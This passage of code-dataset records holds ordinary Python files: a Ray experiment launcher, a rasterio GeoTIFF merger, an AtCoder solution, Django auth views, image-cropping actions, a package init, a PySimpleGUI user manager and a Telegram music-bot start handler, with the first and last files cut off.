num_cpus = len(env_ids) * len(lrs) * len(seeds) * len(batch_sizes)\r\n # print(len(env_ids), len(lrs) , len(seeds) , len(batch_sizes))\r\n ray.init(num_cpus=num_cpus, num_gpus=0)\r\n print('Requesting {} cpus.'.format(num_cpus))\r\n\r\n jobs = [\r\n train.remote(\r\n logdir + '/exps/cmappo-sgd/' + env_id + '/l-{}-b-{}/seed-{}'.format(lr, batch_size, seed),\r\n env_id, lr, 1e7, seed, batch_size, cont)\r\n for env_id, lr, batch_size, seed in itertools.product(env_ids, lrs, batch_sizes, seeds)\r\n ]\r\n\r\n print(jobs)\r\n ray.get(jobs)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ermongroup/MA-AIRL","sub_path":"multi-agent-irl/sandbox/imitation/run_cmappo.py","file_name":"run_cmappo.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"40"} +{"seq_id":"22637365056","text":"import os\nimport rasterio\nfrom rasterio.merge import merge\nimport csv\n\n# Set the input directory path\ninput_dir = '/gws/nopw/j04/ai4er/users/map205/BigEarthNet-v1.0/'\n\n# Initialize list of source files to merge\nsrc_files_to_merge = []\n\n# Collect all subdirectories within the input directory\nsubdirs = [os.path.join(input_dir, name) for name in os.listdir(input_dir) if os.path.isdir(os.path.join(input_dir, name))]\n\n# Loop through subdirectories and add first .tif file to list of source files\nfor subdir in subdirs:\n tif_files = [os.path.join(subdir, name) for name in os.listdir(subdir) if name.endswith('.tif')]\n if len(tif_files) > 0:\n src_files_to_merge.append(tif_files[0])\n\n# Divide the input files into batches of 1,000\nfile_batches = [src_files_to_merge[i:i+1000] for i in range(0, len(src_files_to_merge), 1000)]\n\n# Loop through each batch and merge the files\nfor i, batch in enumerate(file_batches):\n # Open all .tif files in the current batch using rasterio\n src_files = [rasterio.open(f) for f in batch]\n\n # Merge the .tif files using rasterio.merge\n merged, out_transform = merge(src_files)\n\n # Set the output file path and metadata\n output_file = f'/gws/nopw/j04/ai4er/users/map205/mres/global_merged_file_{i}.tif'\n out_meta = src_files[0].meta.copy()\n out_meta.update({'driver': 'GTiff',\n 'height': merged.shape[1],\n 'width': merged.shape[2],\n 'transform': out_transform})\n\n # Write the merged .tif file to disk\n with rasterio.open(output_file, 'w', **out_meta) as dst:\n dst.write(merged)\n \n # Close all the opened source files\n for src_file in src_files:\n src_file.close()\n\n# Save the filenames of the original .tif files for this batch in a .csv file\n filenames_file = f'/gws/nopw/j04/ai4er/users/map205/mres/global_merged_file_{i}_filenames.csv'\n with open(filenames_file, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n for src_file in src_files:\n writer.writerow([src_file.name])\n\n","repo_name":"maplumridge/land-cover-classification","sub_path":"merge_files.py","file_name":"merge_files.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33892341123","text":"import numpy as np\nS = input()\nT = input()\n\nnS = np.array([s for s in S])\nnT = np.array([s for s in T])\nFalse_position = np.where(nS!=nT)[0]\n# import ipdb; ipdb.set_trace()\nfor i in False_position:\n if S[i] != T[i]:\n S = S.translate(str.maketrans({S[i]:T[i], T[i]:S[i]}))\nif S == T:\n print('Yes')\nelse:\n print('No')","repo_name":"SkiMsyk/AtCoder","sub_path":"BeginnerContest110/C_StringTransformation.py","file_name":"C_StringTransformation.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71315616439","text":"from django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\n\nfrom .forms import UserForm\n\nfrom django.contrib import messages\n\n@login_required\ndef index(request):\n if request.user.roles == 'ผู้ดูแล':\n return redirect('/adm/')\n elif request.user.roles == 'หัวหน้างาน':\n return redirect('/manager/')\n elif request.user.roles == 'พนักงาน':\n return redirect('/employee/')\n elif request.user.is_superuser == 'พนักงาน':\n return redirect('/admin/')\n else:\n return redirect('/logout/')\n\ndef login(request):\n messages=\"\"\n if request.user.is_authenticated:\n return redirect('/')\n elif request.method == 'POST':\n user = authenticate(request ,\n username=request.POST['username'],\n password=request.POST['password'])\n if user is not None:\n auth_login(request, user)\n return redirect('/')\n else:\n messages = 'Username หรือ Password ไม่ถูกต้อง'\n return render(request,'login.html',{\n \"messages\":messages\n })\n\n@login_required\ndef logout(request):\n auth_logout(request)\n return redirect('/')\n\ndef register(request):\n if request.user.is_authenticated:\n return redirect('/')\n else:\n if request.method== 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/')\n else:\n print(\"invalid\")\n else:\n form = UserForm()\n form = UserForm(request.POST)\n return render(request,'register.html',{'form':form})\n","repo_name":"thanapatKJ/FactoryApp","sub_path":"FactoryApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35005812889","text":"import os\nfrom typing import Iterator, Optional\n\nfrom imgutils.detect import detect_person, detect_heads, detect_halfbody, detect_eyes\n\nfrom .base import BaseAction\nfrom ..model import ImageItem\n\n\nclass PersonSplitAction(BaseAction):\n def __init__(self, keep_original: bool = False, level: str = 'm', version: str = 'v1.1',\n conf_threshold: float = 0.3, iou_threshold: float = 0.5, keep_origin_tags: bool = False):\n self.keep_original = keep_original\n self.level = level\n self.version = version\n self.conf_threshold = conf_threshold\n self.iou_threshold = iou_threshold\n self.keep_origin_tags = keep_origin_tags\n\n def iter(self, item: ImageItem) -> Iterator[ImageItem]:\n detection = detect_person(item.image, self.level, self.version,\n conf_threshold=self.conf_threshold, iou_threshold=self.iou_threshold)\n\n if 'filename' in item.meta:\n filename = item.meta['filename']\n filebody, ext = os.path.splitext(filename)\n else:\n filebody, ext = None, None\n\n if self.keep_original:\n yield item\n\n for i, (area, type_, score) in enumerate(detection):\n new_meta = {\n **item.meta,\n 'crop': {'type': type_, 'score': score},\n }\n if 'tags' in new_meta and not self.keep_origin_tags:\n del new_meta['tags']\n if filebody is not None:\n new_meta['filename'] = f'{filebody}_person{i}{ext}'\n yield ImageItem(item.image.crop(area), new_meta)\n\n def reset(self):\n pass\n\n\nclass ThreeStageSplitAction(BaseAction):\n def __init__(self, person_conf: Optional[dict] = None, halfbody_conf: Optional[dict] = None,\n head_conf: Optional[dict] = None, head_scale: float = 1.5,\n split_eyes: bool = False, eye_conf: Optional[dict] = None, eye_scale: float = 2.4,\n split_person: bool = True, keep_origin_tags: bool = False):\n self.person_conf = dict(person_conf or {})\n self.halfbody_conf = dict(halfbody_conf or {})\n self.head_conf = dict(head_conf or {})\n self.eye_conf = dict(eye_conf or {})\n self.head_scale = head_scale\n self.eye_scale = eye_scale\n self.split_eyes = split_eyes\n self.split_person = split_person\n self.keep_origin_tags = keep_origin_tags\n\n def _split_person(self, item: ImageItem, filebody, ext):\n if self.split_person:\n for i, (px, type_, score) in enumerate(detect_person(item.image, **self.person_conf), start=1):\n person_image = item.image.crop(px)\n person_meta = {\n **item.meta,\n 'crop': {'type': type_, 'score': score},\n }\n if 'tags' in person_meta and not self.keep_origin_tags:\n del person_meta['tags']\n if filebody is not None:\n person_meta['filename'] = f'{filebody}_person{i}{ext}'\n yield i, ImageItem(person_image, person_meta)\n\n else:\n yield 1, item\n\n def iter(self, item: ImageItem) -> Iterator[ImageItem]:\n if 'filename' in item.meta:\n filename = item.meta['filename']\n filebody, ext = os.path.splitext(filename)\n else:\n filebody, ext = None, None\n\n for i, person_item in self._split_person(item, filebody, ext):\n person_image = person_item.image\n yield person_item\n\n half_detects = detect_halfbody(person_image, **self.halfbody_conf)\n if half_detects:\n halfbody_area, halfbody_type, halfbody_score = half_detects[0]\n halfbody_image = person_image.crop(halfbody_area)\n halfbody_meta = {\n **item.meta,\n 'crop': {'type': halfbody_type, 'score': halfbody_score},\n }\n if 'tags' in halfbody_meta and not self.keep_origin_tags:\n del halfbody_meta['tags']\n if filebody is not None:\n halfbody_meta['filename'] = f'{filebody}_person{i}_halfbody{ext}'\n yield ImageItem(halfbody_image, halfbody_meta)\n\n head_detects = detect_heads(person_image, **self.head_conf)\n if head_detects:\n (hx0, hy0, hx1, hy1), head_type, head_score = head_detects[0]\n cx, cy = (hx0 + hx1) / 2, (hy0 + hy1) / 2\n width, height = hx1 - hx0, hy1 - hy0\n width = height = max(width, height) * self.head_scale\n x0, y0 = int(max(cx - width / 2, 0)), int(max(cy - height / 2, 0))\n x1, y1 = int(min(cx + width / 2, person_image.width)), int(min(cy + height / 2, person_image.height))\n head_image = person_image.crop((x0, y0, x1, y1))\n head_meta = {\n **item.meta,\n 'crop': {'type': head_type, 'score': head_score},\n }\n if 'tags' in head_meta and not self.keep_origin_tags:\n del head_meta['tags']\n if filebody is not None:\n head_meta['filename'] = f'{filebody}_person{i}_head{ext}'\n yield ImageItem(head_image, head_meta)\n\n if self.split_eyes:\n eye_detects = detect_eyes(head_image, **self.eye_conf)\n for j, ((ex0, ey0, ex1, ey1), eye_type, eye_score) in enumerate(eye_detects):\n cx, cy = (ex0 + ex1) / 2, (ey0 + ey1) / 2\n width, height = ex1 - ex0, ey1 - ey0\n width = height = max(width, height) * self.eye_scale\n x0, y0 = int(max(cx - width / 2, 0)), int(max(cy - height / 2, 0))\n x1, y1 = int(min(cx + width / 2, head_image.width)), \\\n int(min(cy + height / 2, head_image.height))\n eye_image = head_image.crop((x0, y0, x1, y1))\n eye_meta = {\n **item.meta,\n 'crop': {'type': eye_type, 'score': eye_score},\n }\n if 'tags' in eye_meta and not self.keep_origin_tags:\n del eye_meta['tags']\n if filebody is not None:\n eye_meta['filename'] = f'{filebody}_person{i}_head_eye{j}{ext}'\n yield ImageItem(eye_image, eye_meta)\n\n def reset(self):\n pass\n","repo_name":"deepghs/waifuc","sub_path":"waifuc/action/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"40"} +{"seq_id":"71758305720","text":"import contextlib as __ctxlib\n\nfrom solders.solders import __version__ as _version_untyped # type: ignore\nfrom solders.solders import (\n account,\n account_decoder,\n address_lookup_table_account,\n clock,\n commitment_config,\n compute_budget,\n epoch_info,\n epoch_schedule,\n errors,\n hash,\n instruction,\n keypair,\n message,\n null_signer,\n presigner,\n pubkey,\n rent,\n rpc,\n signature,\n token,\n transaction,\n transaction_status,\n)\n\nfrom . import system_program, sysvar\n\n__has_bankrun = False\nwith __ctxlib.suppress(ImportError):\n from solders.solders import bankrun\n\n __has_bankrun = True\n\n\n__all_core = [\n \"account_decoder\",\n \"address_lookup_table_account\",\n \"commitment_config\",\n \"errors\",\n \"hash\",\n \"instruction\",\n \"keypair\",\n \"message\",\n \"null_signer\",\n \"presigner\",\n \"pubkey\",\n \"rpc\",\n \"signature\",\n \"token\",\n \"transaction\",\n \"transaction_status\",\n \"sysvar\",\n \"system_program\",\n]\n\n__all__ = [*__all_core, \"bankrun\"] if __has_bankrun else __all_core\n\n__version__: str = _version_untyped\n","repo_name":"kevinheavey/solders","sub_path":"python/solders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"40"} +{"seq_id":"11399214799","text":"import PySimpleGUI as sg\nfrom entidade.usuario import Usuario\nfrom persistencia.usuario_dao import UsuarioDAO\nfrom limite.tela_usuario import TelaUsuario\nfrom limite.tela_altera_usuario import TelaAlteraUsuario\nfrom limite.tela_cadastro_usuario import TelaCadastroUsuario\nfrom limite.tela_seleciona_codigo import TelaSelecionaCodigo\nfrom limite.tela_remove_usuario import TelaRemoveUsuario\nfrom limite.tela_lista_entidades import TelaListaEntidades\n\nclass ControladorUsuario:\n\n def __init__(self, controlador_sistema):\n self.__usuario_dao = UsuarioDAO()\n self.__tela_usuario = TelaUsuario()\n self.__tela_cadastro_usuario = TelaCadastroUsuario()\n self.__tela_seleciona_codigo = TelaSelecionaCodigo()\n self.__tela_altera_usuario = TelaAlteraUsuario()\n self.__tela_remove_usuario = TelaRemoveUsuario()\n self.__tela_lista_entidades = TelaListaEntidades()\n self.__controlador_sistema = controlador_sistema\n\n @property\n def usuarios(self):\n return self.__usuario_dao.get_all()\n\n def inclui_usuario(self):\n self.__tela_cadastro_usuario.init_components()\n while True:\n botao, valores = self.__tela_cadastro_usuario.open(self.__usuario_dao.get_all_keys())\n\n if botao == 'incluir':\n if valores is not None:\n usuario = Usuario(valores['nome'], valores['codigo'])\n self.__usuario_dao.persist(usuario)\n self.__tela_usuario.show_message('Usuário adicionado!', f'O usuário {usuario.codigo} - {usuario.nome} foi adicionado.')\n break\n else:\n break\n\n def altera_usuario(self):\n if len(self.__usuario_dao.get_all()) < 1:\n self.__tela_usuario.show_message(\"Erro!\", \"Não existem usuários cadastrados!\")\n else:\n self.__tela_seleciona_codigo.init_components()\n botao, codigo = self.__tela_seleciona_codigo.open()\n\n usuario_encontrado = None\n if botao == 'buscar':\n if codigo is not None and codigo in self.__usuario_dao.get_all_keys():\n for usuario in self.__usuario_dao.get_all():\n if usuario.codigo == codigo:\n usuario_encontrado = usuario\n self.__tela_usuario.show_message(\"Usuario encontrado!\",\n f\"O usuário de código {codigo} foi encontrado.\")\n break\n self.__tela_altera_usuario.init_components(usuario_encontrado)\n while True:\n botao, novo_nome = self.__tela_altera_usuario.open()\n if botao == 'alterar':\n if novo_nome is not None:\n usuario_encontrado.nome = novo_nome\n self.__usuario_dao.persist(usuario_encontrado)\n self.__tela_altera_usuario.show_message(\"Alteração de usuário\",\n 'Usuário alterado com sucesso!')\n break\n else:\n self.__tela_altera_usuario.show_message(\"Alteração de usuário\", 'Operação cancelada!')\n break\n else:\n if botao != 'cancelar':\n self.__tela_usuario.show_message(\"Erro!\", \"Codigo Inexistente!\")\n\n\n def exclui_usuario(self):\n if len(self.__usuario_dao.get_all()) < 1:\n self.__tela_usuario.show_message('Erro!', 'Não existem usuários cadastrados!')\n else:\n self.__tela_seleciona_codigo.init_components()\n botao, codigo = self.__tela_seleciona_codigo.open()\n\n usuario_encontrado = None\n\n if botao == 'buscar':\n if codigo is not None and codigo in self.__usuario_dao.get_all_keys():\n for usuario in self.__usuario_dao.get_all():\n if usuario.codigo == codigo:\n usuario_encontrado = usuario\n self.__tela_usuario.show_message(\"Usuario encontrado!\",\n f\"O usuário de código {codigo} foi encontrado.\")\n break\n self.__tela_remove_usuario.init_components(usuario_encontrado)\n while True:\n botao = self.__tela_remove_usuario.open()\n\n if botao == 'remover':\n self.__usuario_dao.remove(usuario_encontrado)\n self.__tela_remove_usuario.show_message('Remover usuário', 'Usuário removido com sucesso!')\n self.__tela_remove_usuario.close()\n break\n\n elif botao == 'cancelar':\n self.__tela_remove_usuario.show_message('Remover usuário', 'Operação cancelada!')\n self.__tela_remove_usuario.close()\n break\n\n elif botao in ('cancelar', sg.WIN_CLOSED):\n self.__tela_remove_usuario.show_message('Remover usuário', 'Operação cancelada!')\n self.__tela_remove_usuario.close()\n break\n\n else:\n if botao != 'cancelar':\n self.__tela_usuario.show_message(\"Erro!\", \"Codigo Inexistente!\")\n\n def lista_um_usuario(self):\n if len(self.__usuario_dao.get_all()) < 1:\n self.__tela_usuario.show_message('Erro!', 'Não existem usuários cadastrados!')\n else:\n self.__tela_seleciona_codigo.init_components()\n botao, codigo = self.__tela_seleciona_codigo.open()\n\n usuario_encontrado = None\n informacoes_tabela = []\n colunas = ['Código', 'Usuário']\n\n if botao == 'buscar':\n if codigo is not None and codigo in self.__usuario_dao.get_all_keys():\n for usuario in self.__usuario_dao.get_all():\n if usuario.codigo == codigo:\n usuario_encontrado = usuario\n self.__tela_usuario.show_message(\"Usuario encontrado!\",\n f\"O usuário de código {codigo} foi encontrado.\")\n break\n informacoes_tabela.append([usuario_encontrado.codigo, usuario_encontrado.nome])\n self.__tela_lista_entidades.init_components(informacoes_tabela, colunas, 'Lista de usuários')\n while True:\n botao = self.__tela_lista_entidades.open()\n if botao == 'ok' or botao == None:\n self.__tela_lista_entidades.close()\n break\n else:\n if botao != 'cancelar':\n self.__tela_usuario.show_message(\"Erro!\", \"Codigo Inexistente!\")\n\n\n def lista_usuarios(self):\n if len(self.__usuario_dao.get_all()) < 1:\n self.__tela_usuario.show_message('Erro!', 'Não existem usuários cadastrados!')\n else:\n informacoes_tabela = []\n colunas = ['Código', 'Usuário']\n\n for usuario in self.__usuario_dao.get_all():\n informacoes_tabela.append([usuario.codigo, usuario.nome])\n self.__tela_lista_entidades.init_components(informacoes_tabela, colunas, 'Lista de usuários')\n while True:\n botao = self.__tela_lista_entidades.open()\n\n if botao == 'ok':\n self.__tela_lista_entidades.close()\n break\n else:\n self.__tela_lista_entidades.close()\n break\n\n\n def retornar(self):\n self.__tela_usuario.close()\n\n def sair(self):\n exit(0)\n\n def abre_tela(self):\n opcoes = {1: self.inclui_usuario, 2: self.altera_usuario,\n 3: self.exclui_usuario, 4: self.lista_um_usuario,\n 5: self.lista_usuarios, 6: self.retornar, 0: self.sair}\n\n while True:\n self.__tela_usuario.init_components()\n opcao_escolhida = self.__tela_usuario.tela_opcoes()\n self.__tela_usuario.close()\n\n if opcao_escolhida == 6 or opcao_escolhida == None or sg.WIN_CLOSED:\n self.__tela_usuario.close()\n break\n else:\n opcoes[opcao_escolhida]()","repo_name":"petribrn/gerenciador-estoque","sub_path":"controle/controlador_usuario.py","file_name":"controlador_usuario.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38446782966","text":"import asyncio\n\nfrom pyrogram import filters\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, Message\nfrom youtubesearchpython.__future__ import VideosSearch\n\nimport config\nfrom config import BANNED_USERS\nfrom config.config import OWNER_ID\nfrom strings import get_command, get_string\nfrom AlexaMusic import Telegram, YouTube, app\nfrom AlexaMusic.misc import SUDOERS\nfrom AlexaMusic.plugins.play.playlist import del_plist_msg\nfrom AlexaMusic.plugins.sudo.sudoers import sudoers_list\nfrom AlexaMusic.utils.database import (\n add_served_chat,\n is_served_user,\n add_served_user,\n blacklisted_chats,\n get_assistant,\n get_lang,\n get_userss,\n is_on_off,\n is_served_private_chat,\n)\nfrom AlexaMusic.utils.decorators.language import LanguageStart\nfrom AlexaMusic.utils.inline import help_pannel, private_panel, start_pannel\nfrom AlexaMusic.utils.command import commandpro\n\nloop = asyncio.get_running_loop()\n\n\n@app.on_message(\n filters.command(get_command(\"START_COMMAND\"))\n & filters.private\n & ~filters.edited\n & ~BANNED_USERS\n)\n@LanguageStart\nasync def start_comm(client, message: Message, _):\n await add_served_user(message.from_user.id)\n if len(message.text.split()) > 1:\n name = message.text.split(None, 1)[1]\n if name[0:4] == \"help\":\n keyboard = help_pannel(_)\n return await message.reply_text(_[\"help_1\"], reply_markup=keyboard)\n if name[0:4] == \"song\":\n return await message.reply_text(_[\"song_2\"])\n if name[0:3] == \"sta\":\n m = await message.reply_text(\n \"🥱 احضار بيناتك الخاصه من {config.MUSIC_BOT_NAME} سيرفر.\"\n )\n stats = await get_userss(message.from_user.id)\n tot = len(stats)\n if not stats:\n await asyncio.sleep(1)\n return await m.edit(_[\"ustats_1\"])\n\n def get_stats():\n msg = \"\"\n limit = 0\n results = {}\n for i in stats:\n top_list = stats[i][\"spot\"]\n results[str(i)] = top_list\n list_arranged = dict(\n sorted(\n results.items(),\n key=lambda item: item[1],\n reverse=True,\n )\n )\n if not results:\n return m.edit(_[\"ustats_1\"])\n tota = 0\n videoid = None\n for vidid, count in list_arranged.items():\n tota += count\n if limit == 10:\n continue\n if limit == 0:\n videoid = vidid\n limit += 1\n details = stats.get(vidid)\n title = (details[\"title\"][:35]).title()\n if vidid == \"telegram\":\n msg += f\"🔗[ᴛᴇʟᴇɢʀᴀᴍ ᴍᴇᴅɪᴀ](https://t.me/Shayri_Music_Lovers) ** ᴩʟᴀʏᴇᴅ {count} ᴛɪᴍᴇs**\\n\\n\"\n else:\n msg += f\"🔗 [{title}](https://www.youtube.com/watch?v={vidid}) ** played {count} times**\\n\\n\"\n msg = _[\"ustats_2\"].format(tot, tota, limit) + msg\n return videoid, msg\n\n try:\n videoid, msg = await loop.run_in_executor(None, get_stats)\n except Exception as e:\n print(e)\n return\n thumbnail = await YouTube.thumbnail(videoid, True)\n await m.delete()\n await message.reply_photo(photo=thumbnail, caption=msg)\n return\n if name[0:3] == \"sud\":\n await sudoers_list(client=client, message=message, _=_)\n if await is_on_off(config.LOG):\n sender_id = message.from_user.id\n sender_name = message.from_user.first_name\n return await app.send_message(\n config.LOG_GROUP_ID,\n f\"{message.from_user.mention} البوت بدا ليفحص sᴜᴅᴏʟɪsᴛ\\n\\n**ᴜsᴇʀ ɪᴅ:** {sender_id}\\n**ᴜsᴇʀɴᴀᴍᴇ:** {sender_name}\",\n )\n return\n if name[0:3] == \"lyr\":\n query = (str(name)).replace(\"lyrics_\", \"\", 1)\n lyrical = config.lyrical\n lyrics = lyrical.get(query)\n if lyrics:\n return await Telegram.send_split_text(message, lyrics)\n else:\n return await message.reply_text(\"ғᴀɪʟᴇᴅ ᴛᴏ ɢᴇᴛ ʟʏʀɪᴄs.\")\n if name[0:3] == \"del\":\n await del_plist_msg(client=client, message=message, _=_)\n if name[0:3] == \"inf\":\n m = await message.reply_text(\"🔎\")\n query = (str(name)).replace(\"info_\", \"\", 1)\n query = f\"https://www.youtube.com/watch?v={query}\"\n results = VideosSearch(query, limit=1)\n for result in (await results.next())[\"result\"]:\n title = result[\"title\"]\n duration = result[\"duration\"]\n views = result[\"viewCount\"][\"short\"]\n thumbnail = result[\"thumbnails\"][0][\"url\"].split(\"?\")[0]\n channellink = result[\"channel\"][\"link\"]\n channel = result[\"channel\"][\"name\"]\n link = result[\"link\"]\n published = result[\"publishedTime\"]\n searched_text = f\"\"\"\n😲**معلومات المسارات**😲\n\n📌**عنوان:** {title}\n\n⏳**المدة:** {duration} ᴍɪɴᴜᴛᴇs\n👀**المشاهدات:** `{views}`\n⏰**نشرت في:** {published}\n🎥**القناة:** {channel}\n📎**رابط القناة:** [ᴠɪsɪᴛ ᴄʜᴀɴɴᴇʟ]({channellink})\n🔗**الرابط:** [ᴡᴀᴛᴄʜ ᴏɴ ʏᴏᴜᴛᴜʙᴇ]({link})\n\n💖 البحث يعمل بواسطة {config.MUSIC_BOT_NAME}\"\"\"\n key = InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(text=\"• ʏᴏᴜᴛᴜʙᴇ •\", url=f\"{link}\"),\n InlineKeyboardButton(text=\"• ᴄʟᴏsᴇ •\", callback_data=\"close\"),\n ],\n ]\n )\n await m.delete()\n await app.send_photo(\n message.chat.id,\n photo=thumbnail,\n caption=searched_text,\n parse_mode=\"markdown\",\n reply_markup=key,\n )\n if await is_on_off(config.LOG):\n sender_id = message.from_user.id\n sender_name = message.from_user.first_name\n return await app.send_message(\n config.LOG_GROUP_ID,\n f\"{message.from_user.mention} البوت بدا ليفحص بينات المسارات\\n\\n**ᴜsᴇʀ ɪᴅ:** {sender_id}\\n**ᴜsᴇʀɴᴀᴍᴇ:** {sender_name}\",\n )\n else:\n try:\n await app.resolve_peer(OWNER_ID[0])\n OWNER = OWNER_ID[0]\n except:\n OWNER = None\n out = private_panel(_, app.username, OWNER)\n if config.START_IMG_URL:\n try:\n await message.reply_photo(\n photo=config.START_IMG_URL,\n caption=_[\"start_2\"].format(config.MUSIC_BOT_NAME),\n reply_markup=InlineKeyboardMarkup(out),\n )\n except:\n await message.reply_text(\n _[\"start_2\"].format(config.MUSIC_BOT_NAME),\n reply_markup=InlineKeyboardMarkup(out),\n )\n else:\n await message.reply_text(\n _[\"start_2\"].format(config.MUSIC_BOT_NAME),\n reply_markup=InlineKeyboardMarkup(out),\n )\n if await is_on_off(config.LOG):\n sender_id = message.from_user.id\n sender_name = message.from_user.first_name\n return await app.send_message(\n config.LOG_GROUP_ID,\n f\"{message.from_user.mention} بوتك بدأ.\\n\\n**ᴜsᴇʀ ɪᴅ:** {sender_id}\\n**ᴜsᴇʀɴᴀᴍᴇ:** {sender_name}\",\n )\n\n\n@app.on_message(\n filters.command(get_command(\"START_COMMAND\"))\n & filters.group\n & ~filters.edited\n & ~BANNED_USERS\n)\n@LanguageStart\nasync def testbot(client, message: Message, _):\n out = start_pannel(_)\n return await message.reply_text(\n _[\"start_1\"].format(message.chat.title, config.MUSIC_BOT_NAME),\n reply_markup=InlineKeyboardMarkup(out),\n )\n\n\nwelcome_group = 2\n\n\n@app.on_message(filters.new_chat_members, group=welcome_group)\nasync def welcome(client, message: Message):\n chat_id = message.chat.id\n if config.PRIVATE_BOT_MODE == str(True):\n if not await is_served_private_chat(message.chat.id):\n await message.reply_text(\n \"**خاص بوت الموسيقى**\\n\\nفقط للمحادثات المصرح بها من قبل مالكي الحساب، يرجى الطلب من مالك الحساب في الرسائل الخاصة للمصادقة على محادثتك، وإذا لم ترغب في ذلك، فافعل ما تريد لأني سأغادر..\"\n )\n return await app.leave_chat(message.chat.id)\n else:\n await add_served_chat(chat_id)\n for member in message.new_chat_members:\n try:\n language = await get_lang(message.chat.id)\n _ = get_string(language)\n if member.id == app.id:\n chat_type = message.chat.type\n if chat_type != \"supergroup\":\n await message.reply_text(_[\"start_6\"])\n return await app.leave_chat(message.chat.id)\n if chat_id in await blacklisted_chats():\n await message.reply_text(\n _[\"start_7\"].format(\n f\"https://t.me/{app.username}?start=sudolist\"\n )\n )\n return await app.leave_chat(chat_id)\n userbot = await get_assistant(message.chat.id)\n out = start_pannel(_)\n await message.reply_text(\n _[\"start_3\"].format(\n config.MUSIC_BOT_NAME,\n userbot.username,\n userbot.id,\n ),\n reply_markup=InlineKeyboardMarkup(out),\n )\n if member.id in config.OWNER_ID:\n return await message.reply_text(\n _[\"start_4\"].format(config.MUSIC_BOT_NAME, member.mention)\n )\n if member.id in SUDOERS:\n return await message.reply_text(\n _[\"start_5\"].format(config.MUSIC_BOT_NAME, member.mention)\n )\n return\n except:\n return\n\n\n@app.on_message(commandpro([\"/alive\", \"تنصيب\"]) & ~filters.edited)\nasync def start(client: Client, message: Message):\n await message.reply_photo(\n photo=f\"https://telegra.ph/file/5dd4c0ae6ddb63cd4cc81.jpg\",\n caption=f\"\"\"━━━━━━━━━━━━━━━━━━━━━━━━\\n\\n✪ اهلا بك سورس افاتار يعمل بالفعل \\n✪ لتنصيب بوتك على سورس افاتار @DEV_TOM 🌼 ..\\n\\n┏━━━━━━━━━━━━━━━━━┓\\n┣★ المطور: [ᯓ𓆩˹ ََ𝙏َِ𝙊َِ𝙈ِ ،ِّّ⸙⛥َٰ ( ٍّالبشمبرمج)⏤͟͟͞͞𓆃](https://t.me/DEV_TOM)\\n┣★ التحديثات › : [𝗦𝗢𝗨𝗥𝗖𝗘 𝗔𝗩𝗔𝗧𝗔𝗥](https://t.me/source_av)┓\\n┗━━━━━━━━━━━━━━━━━┛\\n\\n💞 اذا كان لديك اي اسألة \\nتحدث مع مطوري [𖠧 ๏͈͈͈͈͈͈͈ρꪮ𝘬ꫀꪑꪮꪀ𖤓̟̟̟̟̟̟̥̥̥̥̟͜͡️مـغــٰـُ͢ـُـ̷ِْــٰــرور](https://t.me/devpokemon) سورس افاتار يتمنى لك وقتا سعيدا ...\\n\\n━━━━━━━━━━━━━━━━━━━━━━━━\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(\"🌼 𝗦𝗢𝗨𝗥𝗖𝗘 𝗔𝗩𝗔𝗧𝗔𝗥 💮\", url=f\"https://t.me/source_av\")]]\n ),\n )\n\n\n@app.on_message(commandpro([\"/verify\", \"توثيق\"]) & ~filters.edited)\nasync def start(client: Client, message: Message):\n if await is_served_user(message.from_user.id):\n await message.reply_text(\n text=\"😂 عزيزي انت موثق بالفعل\",\n )\n return\n await add_served_user(message.from_user.id)\n await message.reply_photo(\n photo=f\"https://telegra.ph/file/5dd4c0ae6ddb63cd4cc81.jpg\",\n caption=f\"\"\"━━━━━━━━━━━━━━━━━━━━━━━━\\n\\n✪ **تهانينا** 🎉\\n✪ الان انت موثق في بينات افاتار ارجع الان وشغل الموسيقى واستمتع بوقتك 🌼 ..\\n\\n━━━━━━━━━━━━━━━━━━━━━━━━\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(\"🌼 𝗦𝗢𝗨𝗥𝗖𝗘 𝗔𝗩𝗔𝗧𝗔𝗥 💮\", url=f\"https://t.me/source_av\")]]\n ),\n )\n","repo_name":"Masahme/New_source","sub_path":"AlexaMusic/plugins/bot/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":13384,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"20926646099","text":"#!/usr/bin/env python\n\n#-------------\n# Load modules\n#-------------\nfrom netCDF4 import Dataset\nimport numpy\nimport argparse\n\ndef parse_args():\n p = argparse.ArgumentParser(description='Flatten a lat-lon to 1D')\n p.add_argument('input',type=str,help='input file',default=None)\n p.add_argument('output',type=str,help='output file',default=None)\n return vars(p.parse_args())\n\n#------------------\n# Opening the file\n#------------------\ncomm_args = parse_args()\nInput_file = comm_args['input']\nOutput_file = comm_args['output']\nncFid = Dataset(Input_file, mode='r')\nncFidOut = Dataset(Output_file, mode='w', format='NETCDF4')\n\n#---------------------\n# Extracting variables\n#---------------------\n\nhaveLev = 